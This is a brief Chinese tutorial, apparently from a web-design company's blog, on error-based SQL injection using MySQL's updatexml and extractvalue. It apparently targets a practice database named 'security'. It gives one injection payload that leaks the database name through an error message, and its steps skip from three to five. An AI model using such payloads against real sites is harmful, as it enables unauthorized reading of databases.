顯錯注入updatexml和extractvalue的示例分析

顯錯注入updatexml和extractvalue的示例分析,相信很多沒有經(jīng)驗的人對此束手無策,為此本文總結(jié)了問題出現(xiàn)的原因和解決方法,通過這篇文章希望你能解決這個問題。

創(chuàng)新互聯(lián)建站是一家專注于成都網(wǎng)站制作、成都網(wǎng)站設(shè)計與策劃設(shè)計,永寧網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)建站做網(wǎng)站,專注于網(wǎng)站建設(shè)十余年,網(wǎng)設(shè)計領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:永寧等地區(qū)。永寧做網(wǎng)站價格咨詢:028-86922220

首先介紹兩個函數(shù)

UPDATEXML (XML_document, XPath_string, new_value); 

第一個參數(shù):XML_document是String格式,為XML文檔對象的名稱,文中為Doc 

第二個參數(shù):XPath_string (Xpath格式的字符串) ,如果不了解Xpath語法,可以在網(wǎng)上查找教程。 

第三個參數(shù):new_value,String格式,替換查找到的符合條件的數(shù)據(jù) 

EXTRACTVALUE (XML_document, XPath_string); 

第一個參數(shù):XML_document是String格式,為XML文檔對象的名稱,文中為Doc 

第二個參數(shù):XPath_string (Xpath格式的字符串)

一、查詢數(shù)據(jù)庫名稱

show databases;

顯錯注入updatexml和extractvalue的示例分析

二、選擇數(shù)據(jù)庫security

use security;

三、顯示數(shù)據(jù)庫中的表

show tables;

顯錯注入updatexml和extractvalue的示例分析

五、用函數(shù)updatexml注入,獲取數(shù)據(jù)庫名稱

MySQL> select * from users where id=1 and updatexml(2,concat(0x3D,database(),0x3

D),2);

顯錯注入updatexml和extractvalue的示例分析

看完上述內(nèi)容,你們掌握 顯錯注入updatexml和extractvalue的示例分析的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!

當(dāng)前題目:顯錯注入updatexml和extractvalue的示例分析
當(dāng)前路徑:http://bm7419.com/article34/jjsjpe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供小程序開發(fā)、網(wǎng)站內(nèi)鏈、定制開發(fā)虛擬主機(jī)、ChatGPT、

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都做網(wǎng)站